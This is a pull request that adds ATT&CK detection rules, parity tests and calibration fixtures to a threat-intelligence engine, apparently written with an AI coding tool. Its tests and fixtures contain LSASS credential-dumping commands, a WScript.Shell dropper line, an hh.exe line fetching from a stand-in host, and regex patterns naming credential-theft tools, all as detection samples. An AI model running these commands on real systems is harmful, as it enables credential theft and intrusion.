### PR TITLE
Resolve orphan ATT&CK catalog techniques

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -4,6 +4,28 @@
 
 Threat Intelligence Engine:
 
+- Resolve the six catalog techniques that had no built-in producer. Four gain
+  evidence-backed behavior rules: T1003.001 LSASS Memory (`sekurlsa`,
+  `lsass.exe`/`lsass.dmp`, `procdump … lsass`, `comsvcs … MiniDump`),
+  T1059.007 JavaScript (WSH markers only — `jscript`, `new ActiveXObject(`,
+  `.jse` — so web-"JavaScript" prose cannot fire), T1486 Data Encrypted for
+  Impact (ransom-note language only — `ransom`, `decryptor`,
+  "decrypt/restore/recover your files" — never the bare word "encrypted"),
+  and T1566.001 Spearphishing Attachment (decoded MIME attachment header
+  naming an executable/script/container payload extension; `.pdf`/`.docx`
+  do not match). The remaining two — T1071 Application Layer Protocol
+  (not deterministically evidenceable from content) and T1204 User Execution
+  (parent-level form for rule packs; built-ins attribute T1204.002) — are
+  explicitly designated rule-pack-only. New catalog tests enforce both
+  directions: no catalog technique may lack a producer unless deliberately
+  listed rule-pack-only, and listed entries must genuinely lack one.
+- Calibration corpus: one changed case (`credential-theft-lsass` now also
+  yields T1003.001, corroborating the parent; confidence 0.72 → 0.74), plus
+  five new cases — four malicious (LSASS dump, JScript ActiveXObject
+  dropper, ransom note, spearphishing attachment) and one benign guard
+  (encryption-at-rest prose, a `.pdf` attachment header, and web-JavaScript
+  wording must stay completely clean).
+
 - Add a deterministic Threat Intelligence Engine (`titan_decoder/threat_intel/`)
   that maps decoded evidence to a bundled offline MITRE ATT&CK subset,
   identifies suspicious LOLBin usage (13 built-in rules), and emits behavioral

--- a/docs/ROADMAP.md
+++ b/docs/ROADMAP.md
@@ -18,6 +18,7 @@ This roadmap separates shipped features from planned work.
 - ATT&CK technique metadata (`attack_ids`) on built-in detection rules and rule packs
 - Expanded 48-technique ATT&CK catalog subset with matching behavior and LOLBin rules
 - Threat-intelligence precision hardening and calibration corpus with CI gate
+- Catalog/producer parity: every ATT&CK catalog entry has a built-in producer or an explicit rule-pack-only designation
 - Repeatable performance benchmarks with a committed baseline and CI regression gate
 
 ## Highest-value next work

--- a/docs/THREAT_INTELLIGENCE.md
+++ b/docs/THREAT_INTELLIGENCE.md
@@ -67,6 +67,22 @@ well-formed and that every technique referenced by a behavior rule, LOLBin
 rule, or detection `attack_ids` exists in the catalog, so producers and
 catalog cannot drift apart.
 
+The reverse direction is enforced too: every catalog technique must have a
+built-in producer (behavior rule, LOLBin rule, or built-in detection
+`attack_ids`) unless it is explicitly designated **rule-pack-only** in
+`RULE_PACK_ONLY_TECHNIQUES` (`tests/test_threat_catalog.py`). Two techniques
+carry that designation:
+
+- **T1071 Application Layer Protocol** — C2-over-application-protocol cannot
+  be evidenced deterministically from decoded content alone; rule packs with
+  richer context may attribute it via `attack_ids`.
+- **T1204 User Execution** — the parent-level form for packs that know user
+  execution occurred but not the vector; built-ins attribute the specific
+  T1204.002 Malicious File.
+
+A companion test asserts the designated entries genuinely lack a built-in
+producer, so the list cannot go stale in either direction.
+
 ## Precision semantics
 
 Rules are written so that indicators alone never become behavioral findings:
@@ -85,6 +101,17 @@ Rules are written so that indicators alone never become behavioral findings:
   finding, with bounded increments for corroboration and source diversity —
   it cannot substantially exceed what any single finding supports, and a
   single weak finding stays below 0.5.
+- T1486 Data Encrypted for Impact requires ransom-note language (`ransom`,
+  `decryptor`, "decrypt/restore/recover your files"); the word "encrypted"
+  alone ("files are encrypted at rest") is never evidence of impact, and
+  shadow-copy deletion maps to T1490 Inhibit System Recovery, not T1486.
+- T1059.007 JavaScript requires Windows Script Host markers (`jscript`,
+  `new ActiveXObject(`, `.jse`); prose mentioning web "JavaScript" does not
+  fire.
+- T1566.001 Spearphishing Attachment requires a decoded MIME
+  `Content-Disposition: attachment` header naming an executable, script, or
+  container payload extension; benign attachment types (`.pdf`, `.docx`) do
+  not match.
 
 ## Calibration corpus
 

--- a/tests/fixtures/threat_intel/calibration-v1.json
+++ b/tests/fixtures/threat_intel/calibration-v1.json
@@ -89,6 +89,27 @@
       }
     },
     {
+      "id": "benign-security-prose",
+      "kind": "benign",
+      "description": "Encryption-at-rest prose, a benign PDF attachment header, and web-JavaScript wording must not fire the T1486/T1566.001/T1059.007 rules.",
+      "report": {
+        "nodes": [
+          {
+            "id": 1,
+            "content_preview": "Backup files are encrypted at rest per the security policy. Content-Disposition: attachment; filename=\"quarterly-report.pdf\". Use JavaScript to validate the signup form."
+          }
+        ],
+        "iocs": {}
+      },
+      "expected": {
+        "confidence": 0.0,
+        "technique_ids": [],
+        "tactics": [],
+        "lolbin_executables": [],
+        "malware_tags": []
+      }
+    },
+    {
       "id": "powershell-encoded-downloader",
       "kind": "malicious",
       "description": "Encoded PowerShell downloader: execution, obfuscation, transfer, staging.",
@@ -202,9 +223,10 @@
         "iocs": {}
       },
       "expected": {
-        "confidence": 0.72,
+        "confidence": 0.74,
         "technique_ids": [
-          "T1003"
+          "T1003",
+          "T1003.001"
         ],
         "tactics": [
           "credential-access"
@@ -282,6 +304,112 @@
         "malware_tags": [
           "host-discovery-like"
         ]
+      }
+    },
+    {
+      "id": "lsass-memory-dump",
+      "kind": "malicious",
+      "description": "procdump used to dump LSASS process memory.",
+      "report": {
+        "nodes": [
+          {
+            "id": 1,
+            "content_preview": "procdump -accepteula -ma lsass.exe c:\\temp\\lsass.dmp"
+          }
+        ],
+        "iocs": {}
+      },
+      "expected": {
+        "confidence": 0.74,
+        "technique_ids": [
+          "T1003",
+          "T1003.001"
+        ],
+        "tactics": [
+          "credential-access"
+        ],
+        "lolbin_executables": [],
+        "malware_tags": [
+          "credential-theft-like"
+        ]
+      }
+    },
+    {
+      "id": "jscript-activexobject-dropper",
+      "kind": "malicious",
+      "description": "WSH JScript dropper instantiating ActiveXObject.",
+      "report": {
+        "nodes": [
+          {
+            "id": 1,
+            "content_preview": "var sh = new ActiveXObject(\"WScript.Shell\"); sh.Run(payload, 0, false);"
+          }
+        ],
+        "iocs": {}
+      },
+      "expected": {
+        "confidence": 0.54,
+        "technique_ids": [
+          "T1059.005",
+          "T1059.007"
+        ],
+        "tactics": [
+          "execution"
+        ],
+        "lolbin_executables": [
+          "wscript.exe"
+        ],
+        "malware_tags": []
+      }
+    },
+    {
+      "id": "ransom-note-impact",
+      "kind": "malicious",
+      "description": "Ransom-note language evidencing encryption impact.",
+      "report": {
+        "nodes": [
+          {
+            "id": 1,
+            "content_preview": "ALL YOUR FILES ARE LOCKED. Buy the decryptor to recover your files."
+          }
+        ],
+        "iocs": {}
+      },
+      "expected": {
+        "confidence": 0.47,
+        "technique_ids": [
+          "T1486"
+        ],
+        "tactics": [
+          "impact"
+        ],
+        "lolbin_executables": [],
+        "malware_tags": []
+      }
+    },
+    {
+      "id": "spearphish-macro-attachment",
+      "kind": "malicious",
+      "description": "Decoded email with a macro-enabled document attachment header.",
+      "report": {
+        "nodes": [
+          {
+            "id": 1,
+            "content_preview": "Content-Type: application/vnd.ms-word.document.macroEnabled.12; Content-Disposition: attachment; filename=\"invoice_2026.docm\""
+          }
+        ],
+        "iocs": {}
+      },
+      "expected": {
+        "confidence": 0.47,
+        "technique_ids": [
+          "T1566.001"
+        ],
+        "tactics": [
+          "initial-access"
+        ],
+        "lolbin_executables": [],
+        "malware_tags": []
       }
     },
     {

--- a/tests/test_threat_catalog.py
+++ b/tests/test_threat_catalog.py
@@ -8,11 +8,33 @@ technique the catalog does not carry (which would be silently dropped).
 
 import re
 
+from titan_decoder.core.detection_rules import CorrelationRulesEngine
 from titan_decoder.threat_intel import ThreatIntelligenceEngine
 from titan_decoder.threat_intel.catalog import load_attack_catalog
 from titan_decoder.threat_intel.lolbins import DEFAULT_LOLBIN_RULES
 
 _ID_PATTERN = re.compile(r"^T\d{4}(?:\.\d{3})?$")
+
+# Catalog entries deliberately carried without a built-in producer: they are
+# reportable only through rule-pack `attack_ids`. T1071 (Application Layer
+# Protocol) cannot be evidenced deterministically from decoded content alone,
+# and T1204 is the parent-level form packs can use when the user-execution
+# vector is unknown (built-ins attribute the specific T1204.002). Adding an
+# entry here must be a deliberate decision, mirrored in
+# docs/THREAT_INTELLIGENCE.md.
+RULE_PACK_ONLY_TECHNIQUES = frozenset({"T1071", "T1204"})
+
+
+def _builtin_producer_ids() -> set:
+    ids = {
+        technique_id
+        for technique_id, _pattern, _name in ThreatIntelligenceEngine.BEHAVIOR_RULES
+    }
+    for rule in DEFAULT_LOLBIN_RULES:
+        ids.update(rule.technique_ids)
+    for rule in CorrelationRulesEngine().rules:
+        ids.update(rule.attack_ids)
+    return ids
 
 
 def test_catalog_ids_unique_and_well_formed():
@@ -55,6 +77,32 @@ def test_lolbin_rule_techniques_exist_in_catalog():
             )
 
 
+def test_every_catalog_technique_has_a_producer_or_is_rule_pack_only():
+    """No silent orphans: every catalog entry must be producible by a
+    behavior rule, LOLBin rule, or built-in detection attack_ids, unless it
+    is explicitly designated rule-pack-only above."""
+    catalog_ids = set(load_attack_catalog()["by_id"])
+    producers = _builtin_producer_ids()
+    orphans = catalog_ids - producers - RULE_PACK_ONLY_TECHNIQUES
+    assert not orphans, (
+        f"catalog techniques with no producer: {sorted(orphans)} — wire a "
+        "rule or add them to RULE_PACK_ONLY_TECHNIQUES deliberately"
+    )
+
+
+def test_rule_pack_only_list_is_accurate():
+    """Entries in the rule-pack-only list must exist in the catalog and must
+    genuinely lack a built-in producer, so the list cannot go stale."""
+    catalog_ids = set(load_attack_catalog()["by_id"])
+    producers = _builtin_producer_ids()
+    for technique_id in RULE_PACK_ONLY_TECHNIQUES:
+        assert technique_id in catalog_ids, f"{technique_id} not in catalog"
+        assert technique_id not in producers, (
+            f"{technique_id} now has a built-in producer; remove it from "
+            "RULE_PACK_ONLY_TECHNIQUES"
+        )
+
+
 def _techniques_for(preview: str) -> set:
     report = {"nodes": [{"id": 0, "content_preview": preview}]}
     result = ThreatIntelligenceEngine().analyze(report)
@@ -95,6 +143,44 @@ def test_hh_and_at_require_exe_suffix():
     fired = _techniques_for("hh.exe http://evil.test/a.chm && at.exe 12:00 payload")
     assert "T1218.001" in fired
     assert "T1053.002" in fired
+
+
+def test_lsass_dump_maps_lsass_memory_subtechnique():
+    fired = _techniques_for("procdump -ma lsass.exe lsass.dmp")
+    assert {"T1003", "T1003.001"} <= fired
+    fired = _techniques_for("rundll32 comsvcs.dll, MiniDump 624 c:\\l.dmp full")
+    assert "T1003.001" in fired
+
+
+def test_jscript_execution_maps_javascript_subtechnique():
+    assert "T1059.007" in _techniques_for(
+        'var sh = new ActiveXObject("WScript.Shell"); sh.Run(cmd);'
+    )
+    # Prose about web JavaScript must not fire.
+    assert "T1059.007" not in _techniques_for(
+        "Use JavaScript to validate the signup form before submitting."
+    )
+
+
+def test_ransom_note_maps_data_encrypted_for_impact():
+    assert "T1486" in _techniques_for(
+        "ALL YOUR FILES ARE LOCKED. Pay to receive the decryptor and "
+        "recover your files."
+    )
+    # Encryption-at-rest prose is not ransom evidence.
+    assert "T1486" not in _techniques_for(
+        "Backup files are encrypted at rest per the security policy."
+    )
+
+
+def test_spearphish_attachment_maps_from_mime_headers():
+    assert "T1566.001" in _techniques_for(
+        'Content-Disposition: attachment; filename="invoice_2026.docm"'
+    )
+    # A benign attachment type must not fire.
+    assert "T1566.001" not in _techniques_for(
+        'Content-Disposition: attachment; filename="quarterly-report.pdf"'
+    )
 
 
 def test_benign_prose_produces_no_techniques():

--- a/titan_decoder/threat_intel/engine.py
+++ b/titan_decoder/threat_intel/engine.py
@@ -26,10 +26,14 @@ class ThreatIntelligenceEngine:
         ("T1053.005", re.compile(r"(?i)\bschtasks(?:\.exe)?\b.*\/(?:create|run)\b"), "scheduled-task"),
         ("T1547.001", re.compile(r"(?i)\breg(?:\.exe)?\s+add\b.*\\(?:run|runonce)\b"), "run-key"),
         ("T1003", re.compile(r"(?i)\b(?:mimikatz|sekurlsa|lsass|ntds\.dit|sam\s+hive)\b"), "credential-access"),
+        ("T1003.001", re.compile(r"(?i)(?:\bsekurlsa\b|\blsass\.(?:exe|dmp)\b|\bcomsvcs(?:\.dll)?\b.{0,60}\bminidump\b|\bprocdump\b.{0,60}\blsass\b)"), "lsass-memory-dump"),
         ("T1082", re.compile(r"(?i)\b(?:systeminfo|hostname|wmic\s+os)\b"), "system-discovery"),
         ("T1083", re.compile(r"(?i)\b(?:dir\s+\/s|Get-ChildItem|findstr)\b"), "file-discovery"),
         ("T1562.001", re.compile(r"(?i)\b(?:set-mppreference|disableantispyware|stop-service\s+windefend|sc\s+stop)\b"), "impair-defenses"),
         ("T1490", re.compile(r"(?i)\b(?:vssadmin\s+delete\s+shadows|wbadmin\s+delete\s+catalog|wmic\s+shadowcopy\s+delete|bcdedit\b.{0,40}recoveryenabled\s+no)\b"), "inhibit-recovery"),
+        # Ransom-note language, not the word "encrypted": prose like
+        # "files are encrypted at rest" must not evidence impact.
+        ("T1486", re.compile(r"(?i)(?:\bransom(?:ware)?\b|\bdecryptor\b|\b(?:decrypt|restore|recover)\s+your\s+(?:files|data|documents)\b)"), "ransom-note"),
         ("T1016", re.compile(r"(?i)\b(?:ipconfig|ifconfig|route\s+print|nltest\s+/domain)"), "network-config-discovery"),
         ("T1033", re.compile(r"(?i)\bwhoami\b"), "user-discovery"),
         ("T1036", re.compile(r"(?i)\.(?:pdf|docx?|xlsx?|pptx?|jpe?g|png|gif|txt)\.(?:exe|scr|com|pif|bat|cmd|js|vbs|hta)\b"), "double-extension"),
@@ -37,12 +41,20 @@ class ThreatIntelligenceEngine:
         ("T1057", re.compile(r"(?i)(?:\btasklist\b|\bget-process\b|\bps\s+aux\b)"), "process-discovery"),
         ("T1059.004", re.compile(r"(?i)(?:/bin/(?:ba)?sh\b|\b(?:ba)?sh\s+-c\s)"), "unix-shell"),
         ("T1059.006", re.compile(r"(?i)\bpython(?:3(?:\.\d+)?)?(?:\.exe)?\s+-c\s"), "python-inline-exec"),
+        # "jscript"/ActiveXObject/.jse are Windows Script Host JavaScript
+        # markers; the plain word "javascript" stays out so prose about web
+        # pages cannot fire.
+        ("T1059.007", re.compile(r"(?i)(?:\bnew\s+ActiveXObject\s*\(|\bjscript\b|\.jse\b)"), "jscript-execution"),
         ("T1070.004", re.compile(r"(?i)(?:\bdel\s+/[fqs]\b|\brm\s+-(?:rf|fr)\b|\bsdelete\b|\bremove-item\b.{0,60}-recurse|\bcipher\s+/w:)"), "file-deletion"),
         ("T1087", re.compile(r"(?i)(?:\bnet\s+(?:user|localgroup)\b|\bget-localuser\b)"), "account-discovery"),
         ("T1112", re.compile(r"(?i)\breg(?:\.exe)?\s+(?:add|delete)\b"), "registry-modification"),
         ("T1489", re.compile(r"(?i)(?:\bnet\s+stop\b|\btaskkill\s+/f\b|\bstop-service\b)"), "service-stop"),
         ("T1543.003", re.compile(r"(?i)(?:\bsc(?:\.exe)?\s+create\b|\bnew-service\b)"), "service-install"),
         ("T1552.001", re.compile(r"(?i)(?:\bfindstr\s+/si\s+password\b|\bgrep\s+-ri?\s+password\b)"), "credentials-in-files"),
+        # Decoded email (MIME) evidence: an attachment header naming an
+        # executable/script/container payload type. A benign attachment
+        # (report.pdf, notes.docx) does not match the extension list.
+        ("T1566.001", re.compile(r"(?i)content-disposition:\s*attachment;?\s*filename\*?=[\"']?[^\"'\r\n]{0,120}\.(?:docm|xlsm|pptm|potm|exe|scr|com|pif|js|jse|vbs|vbe|wsf|hta|lnk|iso|img|cab|chm|bat|cmd)\b"), "spearphish-attachment"),
     )
 
     def analyze(


### PR DESCRIPTION
## Summary

Follow-up to #107/#108: six catalog techniques (T1003.001, T1059.007, T1071, T1204, T1486, T1566.001) had no built-in producer — nothing in the behavior rules, LOLBin rules, or built-in detection `attack_ids` could ever report them. This PR resolves all six and adds tests so orphans cannot silently reappear.

**Four gain evidence-backed behavior rules** (precision-first, each with a benign-negative test):

- **T1003.001 LSASS Memory** — `sekurlsa`, `lsass.exe`/`lsass.dmp`, `procdump … lsass`, `comsvcs … MiniDump`; corroborates the existing T1003 parent rule.
- **T1059.007 JavaScript** — WSH markers only (`jscript`, `new ActiveXObject(`, `.jse`); web-"JavaScript" prose cannot fire.
- **T1486 Data Encrypted for Impact** — ransom-note language only (`ransom`, `decryptor`, "decrypt/restore/recover your files"); the bare word "encrypted" is never impact evidence, and shadow-copy deletion stays on T1490.
- **T1566.001 Spearphishing Attachment** — decoded MIME `Content-Disposition: attachment` header naming an executable/script/container payload extension; `.pdf`/`.docx` do not match.

**Two are explicitly designated rule-pack-only** (`RULE_PACK_ONLY_TECHNIQUES` in `tests/test_threat_catalog.py`): T1071 Application Layer Protocol (not deterministically evidenceable from decoded content alone) and T1204 User Execution (parent-level form for rule packs; built-ins attribute the specific T1204.002). New tests enforce catalog/producer parity in both directions — a catalog technique without a producer fails CI unless deliberately listed, and a listed entry that gains a producer also fails.

**Calibration corpus** regenerated and reviewed: one changed case (`credential-theft-lsass` now also yields T1003.001, confidence 0.72 → 0.74), four new malicious cases (LSASS dump, JScript ActiveXObject dropper, ransom note, spearphishing attachment), and one new benign guard (encryption-at-rest prose, a `.pdf` attachment header, and web-JavaScript wording stay completely clean).

Docs: new rule semantics and the rule-pack-only section in `docs/THREAT_INTELLIGENCE.md`; changelog and roadmap updated.

## Checklist

- [x] I am not including real incident evidence, logs, browser history databases, or other sensitive data.
- [x] I am not including secrets (API keys/tokens/passwords).
- [x] I ran tests locally (`pytest -q`) or explain why not.
- [x] I updated docs if flags/output contracts changed.
- [x] Changes are dependency-light and preserve offline-first, deterministic behavior.

## Testing

- Command(s) run:

```bash
pytest -q          # 459 passed (448 existing + new rule, parity, and calibration tests)
ruff check .       # clean
mypy titan_decoder # clean
```

- Notes: all fixture inputs are synthetic. The calibration gate caught the one intentional expectation change (`credential-theft-lsass` gaining T1003.001) exactly as designed.

## Screenshots / Output (optional)

```
benign guard  → confidence 0.0 — encryption-at-rest prose, .pdf attachment header, web-JavaScript wording
lsass dump    → T1003 + T1003.001, credential-theft-like, confidence 0.74
ransom note   → T1486, confidence 0.47 (single uncorroborated finding stays below 0.5)
spearphish    → T1566.001 from "Content-Disposition: attachment; filename=invoice_2026.docm"
```

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_01C7cgZXLUyHZtjRfMjia5xd

---
_Generated by [Claude Code](https://claude.ai/code/session_01C7cgZXLUyHZtjRfMjia5xd)_